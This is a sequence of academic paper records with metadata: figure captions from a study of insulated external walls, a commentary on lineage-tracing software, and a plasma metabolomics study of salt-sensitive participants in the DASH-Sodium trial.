year•m 2 of external wall) -T, cost of 1 kWh of electricity in Portugal for household consumers, without VAT or standing charges (€/kWh) (0.139 €/kWh considering an installation of more than 2.3 kVA (EDP, 2011)); -N ic , nominal annual heating needs per square metre of net floor area of the flat (kWh/m 2 *year); η i , nominal efficiency of the heating equipment (1, considering the reference value-RCCTE[30], that was recently updated by REH[36]); -N vc , nominal annual cooling needs per square metre of net floor area of the flat (kWh/m 2 *year); η v , nominal efficiency of the cooling equipment (3, considering the reference value[30]); -A ap , net floor area of the flat under assessment (129.96m 2 ); -A ew , total area of the external wall being assessed (40.27 m 2 ).
Figure 3 .
Figure 3. C2C Global Warming Potential (GWP, in kg CO2 eq, without energy for heating and cooling) / m 2 of the external wall alternatives with ICB.
Figure 4 .
Figure 4. C2C consumption of nonrenewable primary energy (PE-NRe, in MJ, without energy for heating and cooling) / m 2 of the external wall alternatives with ICB.
Figure 3 .
Figure 3. C2C Global Warming Potential (GWP, in kg CO 2 eq, without energy for heating and cooling)/m 2 of the external wall alternatives with ICB.
Figure 4 .
Figure 4. C2C consumption of nonrenewable primary energy (PE-NRe, in MJ, without energy for heating and cooling) / m 2 of the external wall alternatives with ICB.
Figure 4 .
Figure 4. C2C consumption of nonrenewable primary energy (PE-NRe, in MJ, without energy for heating and cooling)/m 2 of the external wall alternatives with ICB.
Figure 6 .
Figure 6.Difference between the NPV/m 2 of external wall of the economic (A1-A5, B2-B4, C2-C4, and D stages) and energy (B6 substage) costs of each external wall alternative and the NPV/m 2 of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 35%, or 50% of the energy needs) of ETICS with ICB.
Figure 7 .
Figure 7. C2C Global Warming Potential (GWP, in kg CO2 eq, without energy for heating and cooling)/m 2 of the external wall alternatives of ETICS with ICB and EPS.
Figure 7 .
Figure 7. C2C Global Warming Potential (GWP, in kg CO 2 eq, without energy for heating and cooling)/m 2 of the external wall alternatives of ETICS with ICB and EPS.
Figure 7 .
Figure 7. C2C Global Warming Potential (GWP, in kg CO2 eq, without energy for heating and cooling)/m 2 of the external wall alternatives of ETICS with ICB and EPS.
Figure 8 .
Figure 8. C2C consumption of non-renewable primary energy (PE-NRe, in MJ, without energy for heating and cooling)/m 2 of the external wall alternatives of ETICS with ICB and EPS.
Figure 10 .
Figure 10.Difference between the NPV/m 2 of external wall of the economic (A1-A5, B2-B4 and C2-C4 and D stages) and energy (B6 sub-stage) costs of each external wall alternative and the NPV / m 2 of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25%, 35% or
Figure 10 .
Figure 10.Difference between the NPV/m 2 of external wall of the economic (A1-A5, B2-B4 and C2-C4 and D stages) and energy (B6 sub-stage) costs of each external wall alternative and the NPV / m 2 of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25%, 35% or 50% of the energy needs) of ETICS with ICB and EPS.
Figure 10 .
Figure 10.Difference between the NPV/m 2 of external wall of the economic (A1-A5, B2-B4 and C2-C4 and D stages) and energy (B6 sub-stage) costs of each external wall alternative and the NPV/m 2 of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25%, 35% or 50% of the energy needs) of ETICS with ICB and EPS.
Figure 11
Figure 11 is similar to Figure 10, but only includes the external wall alternatives that were renovated by the application of ETICS and also indicates their corresponding U-values.This chart helps the decision-maker to choose the best energy renovation alternative from a C2C economic point of view depending on the U-value and consumption of energy wanted and on the available budget.
Figure 11 .
Figure 11.Difference between the NPV of the economic (A1-A5, B2-B4 and C2-C4 and D stages) and energy (B6 substage) costs of each external wall alternative renovated and the NPV of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25% or 35% or 50% of the energy needs) and considering the corresponding U-values.
Figure 11 .
Figure 11.Difference between the NPV of the economic (A1-A5, B2-B4 and C2-C4 and D stages) and energy (B6 substage) costs of each external wall alternative renovated and the NPV of W1, considering different consumption patterns for the use stage (guaranteeing 10%, 25% or 35% or 50% of the energy needs) and considering the corresponding U-values.
Table 1 .
Designation, thickness and thermal performance (U-Value) of the ETICS applied.
Table 2 .
Maintenance, replacement, and repair operations of the external cladding and internal coatings of the external wall solutions evaluated.
Table 1 .
Designation, thickness and thermal performance (U-Value) of the ETICS applied.
Table 2 .
Maintenance, replacement, and repair operations of the external cladding and internal coatings of the external wall solutions evaluated.
Table 3 .
Life-cycle stages of buildings and building materials based on European standards (CEN, 2012a).
Table 5 .
Designation, thickness and type of insulation board in the ETICS applied, and thermal performance (U-value) of the wall after rehabilitation.
Table 6 .
Single-leaf external wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: Brown for ICB and blue for EPS).
Table 6 .
Single-leaf external wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: Brown for ICB and blue for EPS).
Table 7 .
Cavity wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: Brown for ICB and blue for EPS).
Table 7 .
Cavity wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: Brown for ICB and blue for EPS).
Table 7 .
Cavity wall solution with the best performance, without considering the reference wall (the colour of each row depends on the best performing solution for each indicator: Brown for ICB and blue for EPS).Data curation, J.D.S.; Methodology, J.D.S.; Validation, A.M.P.C. and J.J.B.C.S.; Writingoriginal draft, J.D.S.; Writing-review & editing, A.M.P.C., J.J.B.C.S., J.M.C.L.d.B. and M.D.P. | 2019-04-12T07:59:43.959Z | 2019-03-27T00:00:00.000 | {
"year": 2019,
"sha1": "7e23f828d0e642de15efbbd9fd28e768e199201f",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2076-3417/9/7/1285/pdf?version=1553856226",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "7e23f828d0e642de15efbbd9fd28e768e199201f",
"s2fieldsofstudy": [
"Engineering"
],
"extfieldsofstudy": [
"Engineering"
]
} |
269771460 | pes2o/s2orc | v3-fos-license | A computational tool suite to facilitate single-cell lineage tracing analyses
Tracking the lineage relationships of cell populations is of increasing interest in diverse biological contexts. In this issue of Cell Reports Methods, Holze et al. present a suite of computational tools to facilitate such analyses and encourage their broader application.
Distinguishing how shared inheritance shapes cellular phenotypes is a central question in developmental biology, cancer heterogeneity, immunity, and many other biological fields.A powerful example of the utility of such lineage tracing experiments is the mapping of the developmental fate of every cell in the Caenorhabditis elegans embryo by direct observation via light microscopy. 1 While classic techniques for lineage tracing, e.g., via Cremediated reporter expression or T cell receptor or B cell receptor diversification in lymphocytes have been used for decades, recent years have seen an explosion in new approaches. 2,3These newer approaches include the use of ''endogenous'' barcodes generated by somatic mutations in nuclear and mitochondrial genomes as well as a wide variety of exogenous barcoding methods leveraging different genetic engineering approaches such as CRISPR-Cas9, lentiviruses, terminal deoxynucleotidyl transferase (TdT), RAG 1 and 2 enzymes, and more.Importantly, these exogenous barcoding technologies work both in human cell culture/ ex vivo systems as well as in situ for a variety of model organisms including mouse and zebrafish.
Coupled with simultaneous highthroughput molecular phenotyping of the cells, such as through single-cell RNA sequencing (scRNA-seq), these techniques are powerful molecular ''microscopes'' that can link the current state of a cell with its ancestral history. 3However, the introduction of PCR and sequencing errors and the unique aspects of each system pose substantial technical chal-lenges for their analysis. 4Currently, researchers interested in adding lineage information to their favorite model system have no shortage of experimental protocols to choose from; however, there is a comparative lack of broadly applicable, flexible analysis tools capable of analyzing data from diverse protocols. 4ublishing in Cell Reports Methods, Holze et al. 5 have developed a tool suite that complements existing tools [6][7][8][9] and could greatly enhance the widespread adoption of such techniques by non-specialist teams.It also helps to address the crucial need for clearer guidelines and standardized metrics to evaluate new datasets, improving the overall reproducibility of single-cell lineage tracing results. 4he BARtab and bartools analysis suite reported by Holze et al. 5 is a significant step forward by simplifying single-cell lineage tracing results analysis for a broad community.Implemented both as a Nextflow pipeline and R package, these tools allow flexible analyses of diverse barcoding approaches with a particular focus on quality control, barcode identification and quantification, and multiple plotting options as well as statistical evaluation of barcode composition and diversity (Figure 1).The first tool, BARtab, is dedicated to early processing steps of fastq or bam files to identify and quantify barcodes.This can be applied both to bulk sequencing protocols as well as to single-cell protocols.Together with the Cell-Barcode R tool recently released, 6 these are the first tools incorporating singlecell input from a diversity of wet lab protocols with high flexibility in both the design and lengths of the barcodes.Therefore, they could be broadly taken up by the community for standard analyses of diverse experimental approaches.
The second package, bartools, is dedicated to the further analysis of quantified barcode abundance estimates and can import both the BARtab output as well as results from other software packages in simple csv format.Bartools focuses specifically on barcode normalization, visualization, and evaluation of barcode composition and diversity alongside basic statistical testing.The introduction of intuitive visualization techniques and accompanying statistics greatly aids exploratory analysis of such large datasets and rapid QC evaluation of new experiments.For non-specialist teams, this will enable the incorporation of such approaches in their experimental toolbox.bartools does require the user to be familiar with the R environment, while other tools have provided Rshiny apps for even easier access. 8,9The authors describe extensive testing against previously published datasets, both from their own lab as well as others.This includes not only barcode assays performed by bulk sequencing as well as scRNA-seq but also spatial transcriptomics, demonstrating the most upto-date range of utility.
The field faces upcoming challenges in providing guidelines on how to identify barcodes from noise and provide accurate barcode identification and quantification. 4t is easy to generate ''normal looking'' data that are in fact polluted by technical artifacts such as PCR or sequencing errors.Simulation tools incorporated into analysis suites have already started to address such issues, 6 but more diverse barcode designs as well as biological and technical parameters need to be added.Additionally, such tools need to be extended to incorporate evolvable barcodes that introduce added complexity to the analysis. 7While evolvable barcodes have their own diversity of designs, incorporating them would provide a truly flexible suite of tools for all single-cell lineage analysis.Finally, maintaining and updating the existing tools over time is often a challenge in academia.The successful examples of Seurat and scanpy for scRNA-seq analyses should guide the field.
Cell Reports Methods 4 ,
May 20, 2024 ª 2024 The Authors.Published by Elsevier Inc. 1 This is an open access article under the CC BY license (http://creativecommons.org/licenses/by/4.0/).
Figure 1 .
Figure 1.Schematic of BARtab and bartools applications Cell lineage can be determined by multiple experimental barcoding protocols (left).BARtab and bartools, published by Holze et al. 5 in this issue of Cell Reports Methods, provide flexible, broadly applicable computational analysis tools that can analyze diverse barcoding experimental protocols, providing quality control assessment, diverse visualization tools, and statistical testing.Figure created using BioRender.com. | 2024-05-16T06:17:54.866Z | 2024-05-01T00:00:00.000 | {
"year": 2024,
"sha1": "480e68120616931ed0d59d70fab3f848a24b51b6",
"oa_license": "CCBY",
"oa_url": "http://www.cell.com/article/S2667237524001243/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "f30ea379bcd3683bb323c4272314282571ea5bd2",
"s2fieldsofstudy": [
"Computer Science",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
234767844 | pes2o/s2orc | v3-fos-license | An exploratory analysis of comparative plasma metabolomic and lipidomic profiling in salt-sensitive and salt-resistant individuals from The Dietary Approaches to Stop Hypertension Sodium Trial
Objective: This study conducted exploratory metabolomic and lipidomic profiling of plasma samples from the DASH (Dietary Approaches to Stop Hypertension) Sodium Trial to identify unique plasma biomarkers to identify salt-sensitive versus salt-resistant participants. Methods: Utilizing plasma samples from the DASH-Sodium Trial, we conducted untargeted metabolomic and lipidomic profiling on plasma from salt-sensitive and salt-resistant DASH-Sodium Trial participants. Study 1 analyzed plasma from 106 salt-sensitive and 85 salt-resistant participants obtained during screening when participants consumed their regular diet. Study 2 examined paired within-participant plasma samples in 20 salt-sensitive and 20 salt-resistant participants during a high-salt and low-salt dietary intervention. To investigate differences in metabolites or lipidomes that could discriminate between salt-sensitive and salt-resistant participants or the response to a dietary sodium intervention Principal Component Analysis and Orthogonal Partial Least Square Discriminant Analysis was conducted. Differential expression analysis was performed to validate observed variance and to determine the statistical significance. Results: Differential expression analysis between salt-sensitive and salt-resistant participants at screening revealed no difference in plasma metabolites or lipidomes. In contrast, three annotated plasma metabolites, tocopherol alpha, 2-ketoisocaproic acid, and citramalic acid, differed significantly between high-sodium and low-sodium dietary interventions in salt-sensitive participants. Conclusion: In DASH-Sodium Trial participants on a regular diet, plasma metabolomic or lipidomic signatures were not different between salt-sensitive and salt-resistant participants. High-sodium intake was associated with changes in specific circulating metabolites in salt-sensitive participants. Further studies are needed to validate the identified metabolites as potential biomarkers that are associated with the salt sensitivity of blood pressure.
INTRODUCTION
H ypertension is a critical global health issue that is associated with concomitant increases in cardiovascular and renal disease and morbidity. According to the 2017 American Heart Association (AHA) guidelines, the prevalence of hypertension among United States adults is 46% [1]. Several clinical studies have presented strong evidence that excess dietary salt causes an increase in blood pressure (BP) that fosters an increased risk of premature cardiovascular morbidity and mortality [2][3][4][5][6][7][8]. Although the BP responses to salt modestly affect the population as a whole, some individuals exhibit an exaggerated BP response to salt intake and are characterized as salt-sensitive individuals. Salt-sensitive hypertension occurs in approximately 50% of hypertensive patients, and salt-sensitive individuals are at an increased risk of adverse cardiovascular outcomes [7]. Despite the increasing evidence of adverse effects of excess dietary salt, 90% of United States adults consume an excess of dietary sodium intake that exceeds the AHA recommended level of less than 2300 mmol/day of sodium for most adults and a target intake of 1500 mmol/day of sodium that is recommended for hypertensive individuals [9]. Thus, identifying individuals that are salt-sensitive is critical. Currently, the only method of identifying salt-sensitive individuals is monitoring the BP changes with a carefully performed time-consuming dietary protocol that is not feasible for large-scale clinical diagnosis [10]. Therefore, there remains a critical need to identify alternative approaches to determine the salt sensitivity of BP.
Genetic, lifestyle, and environmental factors may influence the development of salt sensitivity. However, the exact underlying physiological and metabolic factors that drive the salt sensitivity of BP are not known. The profiling of biological analytes, including metabolites (metabolomics) and lipids (lipidomics), offers a unique approach to measure physiological and biochemical effects associated with a disease state [11,12]. Metabolomics and lipidomics have been increasingly used to identify disease biomarkers for cardiovascular diseases, including hypertension [13][14][15][16]. Thus, studying plasma metabolomic and lipidomic profiling in salt-sensitive individuals may help establish unique biomarkers to determine the salt sensitivity of BP.
In this study, we conducted exploratory untargeted plasma metabolomic and lipidomic profiling on salt-sensitive and saltresistant participants from the Dietary Approaches to Stop Hypertension 2 Sodium (DASH-Sodium) Trial. The DASH-Sodium clinical trial examined the impact of dietary sodium on BP in individuals via a control diet, which models the typical American consumption, or the DASH diet, both delivered at high, intermediate, and low levels of sodium [17,18]. This carefully monitored dietary trial study provided the opportunity to identify salt-sensitive versus salt-resistant individuals by their BP response to dietary sodium intervention. The novelty of our current study is that we examined plasma metabolic and lipidomic traits among salt-sensitive and salt-resistant participants at screening when maintained on their regular diet (i.e. prior to a dietary intervention) and in a subset of participants their response to dietary salt intervention on the DASH control diet. Our primary hypothesis was that salt-sensitive participants would exhibit altered metabolic and lipidomic profiling at baseline screening on their regular diet. Our secondary hypothesis was that any differences in the metabolic and lipidomic profile between salt-sensitive and salt-resistant will be exaggerated by a high sodium diet.
METHODS
The DASH-Sodium Trial, a multicenter randomized control trial sponsored by the National Heart, Lung and Blood Institute (NHLBI) was conducted to test the effects of dietary sodium on blood pressure. The details of the DASH-Sodium Trial (Clin-icalTrials.gov Identifier NCT00000608; Clinical Trial Registry https://clinicaltrials.gov/ct2/show/NCT00000608) study design have been previously described in detail [17]. In brief, the trial was conducted in 412 healthy adult individuals aged 22 years or older with a SBP of 120-159 mmHg and DBP of 80-95 mmHg (range normal to Stage 1 hypertension). After a screening phase (during which participants were consuming their regular diet) and a 2-week run-in period, by using a parallel study design method, participants were randomized to receive a control diet representing a typical American diet or a DASH diet that is rich in fruits, vegetables, and low-fat dairy food. Using a crossover design, the participants in each dietary arm (control or DASH) were further randomized to receive three different sodium levels -low (50 mmol/day -optimal recommended daily intake), intermediate (100 mmol/day -the upper limit of currently recommended sodium levels), or high-salt (150 mmol/ day -current typical US sodium intake) sodium content, for 30 days.
Twenty-four-hour ambulatory blood pressure recordings and overnight fasted plasma samples were obtained during the screening period, when participants were consuming their regular diet, and during the last week of each dietary sodium intake period. The NHLBI Biologic Specimen and Data Repository Information Coordinating Center (BioLINCC) approved our request to obtain stored plasma samples from the DASH-Sodium Trial. In the DASH-Sodium Trial, participants who exhibited an SBP increase of 5 mmHg or higher on the highsalt diet compared with the SBP value recorded on a low-salt intake were classified as salt-sensitive, whereas participants with less than 5 mmHg change in SBP between high-salt and low-salt diet were considered salt-resistant. To characterize the metabolomic and lipidomic responses, we used plasma samples collected at the time of screening from patients consuming their standard daily intake (referred to as baseline) from 106 salt-sensitive and 85 salt-resistant participants (total 192 participants) who were subsequently assigned to a control diet in the DASH-Sodium low-salt or high-salt intervention. This represents the total number of participants that were randomly assigned to the control diet in DASH-Sodium for which plasma samples were available at screening and during the low-salt and high-salt interventions. Additionally, to address our secondary hypothesis, in a subset of these participants (20 salt-sensitive and 20 salt-resistant) who were randomly selected from the pool of 106 salt-sensitive and 85 salt-resistant participants, plasma samples from within the same participants, during both a high-salt and low-salt dietary intervention, while participants were maintained on a control diet, were also examined. An untargeted metabolic and lipidomic screen of plasma samples was performed by the West Coast Metabolomics Center at UC Davis (http://metabolomics.ucdavis.edu/) as described below. Raw data files are stored at the NIH metabolomics database (www.metabolomicsworkbench.org) and KEGG identifiers were obtained from the community database KEGG LIGAND DB. the chromatogram. Result were exported to a data server with absolute spectra intensities and further processed by the BinBase filtering algorithm (rtx5) with the following settings: validity of chromatogram (<10 peaks with intensity >10 7 counts/s), unbiased retention index marker detection (MS similarity >800, the validity of intensity range for high m/z marker ions), retention index calculation by fifth order polynomial regression. Spectra were cut to 5% base peak abundance and matched to database entries from most to least abundant spectra using the following matching filters: retention index window AE 2000 units (equivalent to about AE 2 s retention time), validation of unique ions and apex masses (based on unique ion inclusion in apexing masses and presentation at >3% of base peak abundance), mass spectrum similarity fit criteria dependent on peak purity and signal/noise ratios, and a final isomer filter. Quantification was reported as peak height (mz value) using the unique ion as default at a specific retention index. A quantification report table was produced for all database entries that were positively detected in more than 10% of the samples of a study design class (as defined in the miniX database) for unidentified metabolites.
Metabolomic data normalization and quality control Data was normalized by vector normalization in which the sum of all peak heights for all identified metabolites for each sample was calculated and termed 'mTIC'. Subsequently, significant differences between the treatment groups or cohorts mTIC averages were determined. If these averages were different by P less than 0.05, the data were normalized to each group's average mTIC. If averages between treatment groups or cohorts were not different, data was normalized to the total average mTIC. Blanks were run as negative quality controls to evaluate contamination and background noise. Additionally, a quality control sample of National Institute of Standards and Technology standard plasma was run after each 11th sample injection.
Lipidomic profiling
Sample extraction A 20ml aliquot of each sample was added to 975 ml of premixed, ice-cold, N 2 purged 3 : 10 MeOH (methanol): MTBE (methyl-tertiary butyl ether) and quality control mix [22 : 1CE (cholesteryl esters)] and 188 ml of LC-MS grade water and gently shaken for 6 min at 4 8C. Following centrifugation (2 min at 14 000g), the upper organic phase was divided into two 350 ml aliquots and the bottom aqueous phase was divided into two 110 ml aliquots, one aliquot from each organic phase was dried down by centrivap. The upper phase was reconstituted in 110 ml of a MeOH/toluene (9 : 1) mixture containing an internal standard 12-[[(cyclohexylamino)carbonyl]amino]-dodecanoic acid (CUDA) at 50 ng/ml. The lower phase was reconstituted in 100 ml of acetonitrile : H 2 O (80 : 20).
Data acquisition
Charged surface hybrid analysis Extracts were separated using a charged surface hybrid (CSH) C18 column (Waters). For ESI (electrospray ionization) positive mode the Mobile phase A constituted 60 : 40 acetonitrile : water and 10 mmol/l ammonium formate with 0.1% formic. Mobile phase B solvent constituted 90 : 10 isopepanolol : acetonitrile with 10 mmol/l ammonium formate and 0.1% formic acid at a flow rate of 0.6 ml/min. For ESI-negative mode, the composition of mobile phases was identical but 10 mmol/l ammonium acetate was used in place of ammonium formate. The quadrupole/time-of-flight (QTOF) mass spectrometers are operated with ESI performing a full scan in positive mode (Agilent 6530) and negative mode (Agilent 6550).
Data processing and quality control
Data processing was done using MS-DIAL [20], followed by a blank subtraction in Microsoft Excel and cleanup of data using MS-FLO [21]. Peaks were annotated in manual comparison of MS/MS spectra and accurate masses of the precursor ion to spectra given in the Fiehn laboratory's LipidBlast spectral library [22]. Blanks were run as negative quality controls to evaluate both contamination and background noise and CUDA was used as internal standard in all samples. Additionally, a quality control sample of National Institute of Standards and Technology NIST standard plasma was run after 11th sample injection.
Data
The metabolomics and lipidomics data obtained from the UC Davis West Coast Metabolomics core was provided to GeneVia technologies for analysis. For metabolomics data, normalization was applied as described above. However, for lipidomics data since no normalization had been previously applied and as no internal standards were used as untargeted analysis was conducted, the data was assessed raw, and with two different normalization methods; quantile normalization and Systemic Error Removal by Random Forest (SERFF) normalization [23].
Quality control
Principal component analyses (PCA) were performed on the data following log 2 transformation and the results were visualized using R packages ggfortify [24] and ggplot2 [25] with the samples colored according to group. Separate PCAs were carried out on the raw data as well as the two different normalization methods for lipidomics data. Additional PCA plots were also produced, coloring the samples according to race and sex, to investigate any potential relationships. Orthogonal Partial Least Square Discriminant Analysis (OPLS-DA) was also performed as a secondary control indicator on the dataset, using the MetaboAnalyst R R package [26].
Differential expression analysis
The metabolite and lipidome profile was compared between sample groups; salt-sensitive versus salt-resistant individuals, salt-sensitive high-salt diet versus salt-sensitive low-salt diet, salt-resistant high-salt diet versus salt-resistant low-salt diet, salt-sensitive high-salt diet versus salt-resistant high-salt diet, and salt-sensitive low-salt diet versus saltresistant low-salt diet. Statistical testing between sample groups was performed with limma [27] using log transformed data. Adjusted P values were also calculated by correcting for multiple testing using the Benjamin-Hochberg method with a false discovery rate of 0.05 [28]. Results were obtained both unfiltered and filtered for high-salt diet versus low-salt diet in salt-sensitive and salt-resistant groups and unfiltered for salt-sensitive versus salt-resistant groups, with metabolites presenting an adjusted P value less than 0.05 and absolute log 2 fold change greater than 1 being considered as differentially expressed. Further analysis was carried out using the MetaboAnalyst R R package [26] for salt-sensitive versus salt-resistant groups. Due to consistent results obtained with Limma, remaining analysis were done using limma alone.
Participant demographics
We analyzed fasted plasma samples from 191 DASHsodium trial participants for untargeted metabolomic and lipidomic profiling. The demographic characteristics of these participants are summarized in Table 1. Overall, there was an equivalent distribution of men and women in both the salt-resistant and salt-sensitive groups. While the distribution of ethnic backgrounds among men was generally similar across the salt-sensitive and salt-resistant groups, the number of African-American women in salt-sensitive group was higher compared with salt-resistant group. The demographic characteristics for education, income, and education levels were largely similar across the salt-sensitive and salt-resistant groups.
Metabolomic baseline plasma profiling of saltsensitive versus salt-resistant participants PCA showed no difference in the metabolomics profile between salt-sensitive and salt-resistant participants at baseline consuming their standard daily intake. Further evaluation via PCA for independent groups constituting of sex and race also showed no difference between metabolites between salt-sensitive versus salt-resistant participants (Supplementary Figures 1, http://links.lww.com/ HJH/B670 and 2, http://links.lww.com/HJH/B670, respectively). Orthogonal Partial Least Squares Discriminant Analysis (OPLS-DA) showed no significant difference between salt-sensitive and salt-resistant groups (Fig. 1).
The differential expression analysis on the comparisons between salt-sensitive versus salt-resistant ( Fig. 2 Metabolomic profiling comparing the responses to a high-salt versus low-salt diet between salt-sensitive and salt-resistant participants The differential expression analysis of the metabolomic profile in the high-salt versus low-salt dietary intervention in salt-sensitive participants maintained on a control diet showed a significant difference (an adjusted P value <0.05 and absolute log 2 fold change >1) in three annotated metabolites, tocopherol alpha, 2-ketoisocaproic acid, and citramalic acid ( Fig. 3 and Table 2) and two nonannotated metabolites labeled 210343 and 390144 (Supplementary Table 4, http://links.lww.com/HJH/B670). In the salt-sensitive group, the high-salt dietary intervention was associated with a significant increase in citramalic acid levels and a significant decrease in the levels of tocopherol alpha, 2ketoisocaproic acid, 210343 and 390144. The comparative differential expression analysis in salt-resistant participants yielded no significant effect of alterations in dietary salt intake on the metabolomic profile.
Lipidomic profiling to compare salt-sensitive versus salt-resistant participants
Lipidomics OPLS-DA showed no difference in the baseline lipid profile between salt-sensitive and salt-resistant participants consuming their regular diet (Fig. 4). Additionally, the lipid differential expression analysis yielded no differences among the plasma lipidomes between salt-sensitive and salt-resistant groups at baseline (Supplementary Table 5, http://links.lww.com/HJH/B670).
DISCUSSION
The salt sensitivity of BP is strongly linked to hypertension risk [2][3][4][5][6][7][8]. Clinical identification of the salt sensitivity of BP was conducted in the DASH-Sodium Trial. Utilizing plasma samples from the DASH-Sodium Trial, we employed untargeted metabolomic and lipidomic techniques with the goal to identify potential biomarkers of the salt sensitivity of BP. At the time of screening in DASH-Sodium Trial when participants were consuming their standard daily intake, we observed no difference among annotated metabolites or lipidomes between salt-sensitive and salt-resistant participants. However, sub-group analysis of plasma metabolites in salt-sensitive participants maintained on a control diet in which only the dietary sodium content was modified and all remaining dietary components were unaltered revealed that a high-salt dietary intervention decreased the content of alpha-tocopherol and 2-Ketoisocaproic acid species, and increased the content of citramalic acid. Alpha-tocopherol, the predominant form of vitamin E in humans, is a lipid-soluble antioxidant [29,30]. Significantly, alpha-tocopherol supplementation in Dahl salt-sensitive (DSS) rats maintained on a high-salt diet (8% NaCl) prevented the development of salt-sensitive hypertension [31]. Given our observation of a reduction in the level of the metabolite alpha-tocopherol during a HS dietary intervention in the salt-sensitive sub-group we speculate that reduced alpha-tocopherol levels may contribute to the sensitivity of blood pressure in human particpants, and, increased dietary intake of vitamin E may potentially reduce the salt sensitivity of blood pressure. 2-Ketoisocaproic acid, a leucine metabolite, suppresses skeletal muscle insulinmediated glucose transport and is associated with insulin resistance [32,33], which is linked to the salt sensitivity of BP [34,35]. In our study, high-salt diet in salt-sensitive participants was associated with a decrease in 2-ketoisocaproic acid levels. However, as diabetes was an exclusion criterion for the DASH-Sodium Trial participants, we are unable to examine a potential association between 2-ketoisocaproic and diabetes in salt-sensitive participants in our analysis. In our study, elevated levels of citramalic acid metabolites were observed following high-salt intake in salt-sensitive individuals. Increased levels of citramalic acid metabolites have been linked with obesity [36], suggesting a possible association of obesity and the salt sensitivity of BP. Consequently, the association of citramalic acid with high-salt intake in the salt-sensitive individuals warrants further investigation.
Prior targeted plasma metabolic phenotyping of the DASH-sodium trial reported that a low-salt intervention was associated with an increased level of metabolites involved in methionine metabolism, tryptophan and decreased levels of the short-chain fatty acid isovalerate and g-glutamyl amino acids were observed [37]. The altered metabolomic profile observed between our study and prior analyses may be attributed to our untargeted approach, the inclusion of plasma samples from only a small subset of participants with high-salt to low-salt intervention from the control diet group only and analytical separation into saltsensitive and salt-resistant groups. Additionally, a doubleblind crossover study in middle-aged adults with elevated Major annotated plasma metabolite classes featuring significant changes associated with high-salt dietary intervention relative to low-salt dietary intervention in salt-sensitive individuals (n ¼ 20) from DASH-Sodium Trial maintained on a control diet that exhibited significant changes in a specific metabolite within that class. The results are based on the differential expression analysis on the comparisons of metabolites predicted to be differentially expressed based on cut-offs of adjusted P value less than 0.05 and absolute log 2 fold change greater than 1. Kegg, Kyoto Encyclopedia of Genes and Genomes, log FC, log fold change, P value is calculated per individual comparison, and adjusted P value for multiple testing by Benjamin-Hochberg procedure that takes into account multitest correction.
BP that examined urinary metabolite changes in response to dietary sodium restriction reported an increase in succinate, methionine sulfoxide, S adenosylhomocysteine, D gluconate, and aspargine [38]. In our study, the changes in these metabolites were not observed, which may be attributed to the difference between urinary and plasma metabolites. These studies highlight the importance of considering sample type and comorbidities whenever conducting metabolomic and lipidomic analyses. Hypertension, irrespective of the salt sensitivity of BP has been linked to alterations in metabolomic and lipidomic profiles [13][14][15][16]. A plasma metabolomics study comparing young hypertensive and normotensive groups observed differences in the levels of glycine, lysine, and cysteine [39]. In contrast, the urinary metabolite analysis from the INTERMAP study revealed a positive association of alanine and an inverse association of hippurate, formate, and Nmethylnicotinate with increased BP [40]. A lipidomic study conducted in hypertensive and normotensive men reported reduced levels of ether phosphatidylcholines and phosphatidylethanolamines with hypertension [41]. In contrast, lipidomic profiling in treated and untreated hypertensive patients showed increased levels of several triacylglycerol species in hypertension that were reduced in response to antihypertensive drugs [42]. The absence of an altered lipidomic profile between salt-sensitive and salt-resistant participants in the current untargeted exploratory analysis is supported by the prior finding of the DASH-Sodium Trial that changes in dietary sodium intake over the range of 50-150 mmol/day did not affect blood lipid concentrations [43].
The current study has several strengths: the DASH-Sodium Trial was a carefully conducted controlled feeding study with crossover design for dietary sodium intervention that allowed participants to serve as their own control, our current analysis included sub-group analysis of plasma samples from participants who were on the control diet, which is representative of a typical American diet, and saltsensitive and the salt-resistant groups were preidentified based on the SBP changes observed with high-salt to lowsalt diet intervention at the end of the DASH-Sodium Trial.
Potential limitations of the current study include: a comparatively small sample size as the study was conducted in a subset of salt-sensitive and salt-resistant groups; despite the use of Benjamin Hochberg correction to correct for a false discovery rate we acknowledge the possibility of falsepositive results and that these findings require future validation and replication in additional independent datasets; and owing to sample normalization without the use of internal standards our data is qualitative not quantitative.
In conclusion, our untargeted metabolomic and lipidomic plasma profiling in participants form the DASH-Sodium trial showed that there was no difference in plasma metabolomic and lipidomic profiles between salt-sensitive and salt-resistant participants at baseline on their regular dietary intake. This outcome does not support our primary hypothesis that salt-sensitive individuals would exhibit altered metabolic and lipidomic profiles. In contrast, our sub-group analysis shows that in salt-sensitive participants, a high-salt intervention was associated with alterations in the levels of tocopherol alpha, 2-ketoisocaproic acid, and citramalic acid, supporting our secondary hypothesis that salt-sensitive participants exhibit an altered metabolomic profile to a high-sodium diet. Further investigations are required to understand the potential physiological significance of these findings and the utility of an association of alterations in these metabolites with the salt sensitivity of BP. | 2021-05-19T06:17:02.353Z | 2021-05-17T00:00:00.000 | {
"year": 2021,
"sha1": "352f3b917de6cbaf62bfc5c85b1051fc76e7f4c3",
"oa_license": "CCBYNCND",
"oa_url": "https://journals.lww.com/jhypertension/Fulltext/2021/10000/An_exploratory_analysis_of_comparative_plasma.6.aspx",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "543448f47be2b24f0f362c61b7f1630579c9d794",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
253558766 | pes2o/s2orc | v3-fos-license | THE IMPACT OF FEATURE SELECTION ON THE PROBABILISTIC MODEL ON ARRHYTHMIA DIAGNOSIS
